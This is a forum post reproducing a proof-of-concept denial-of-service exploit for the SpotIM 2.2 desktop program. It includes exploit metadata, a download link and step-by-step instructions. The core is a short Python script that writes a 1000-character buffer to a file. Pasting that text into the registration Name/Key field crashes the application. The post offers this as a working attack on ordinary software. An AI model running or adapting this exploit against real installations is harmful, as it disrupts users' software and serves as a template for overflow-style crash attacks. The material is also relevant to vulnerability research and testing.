Post a Reply
3041 views

SpotIM 2.2 Denial Of Service

  1. 10 months ago
    Edited 10 months ago by Men in Black

    h114.png

    SpotIM version 2.2 denial of service proof of concept exploit.

    MD5 | e00d56659cc1b271c52df57fe932349c

    Download => spotim22-dos.txt

    # -*- coding: utf-8 -*-
    # Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
    # Date: 09/05/2019
    # Author: Alejandra Sánchez
    # Vendor Homepage: http://www.nsauditor.com
    # Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
    # Version: 2.2
    # Tested on: Windows 10
    
    # Proof of Concept:
    # 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
    # 2.- Copy the text from the generated SpotIM.txt file to clipboard
    # 3.- Open SpotIM
    # 4.  Select "Register" > "Enter Registration Code..."
    # 5.- Paste clipboard in the Name/Key field 
    # 6.- Click 'OK'
    # 7.- Crashed
    
    buffer = "\x41" * 1000
    f = open ("SpotIM.txt", "w")
    f.write(buffer)
    f.close()
 

or Sign Up to reply!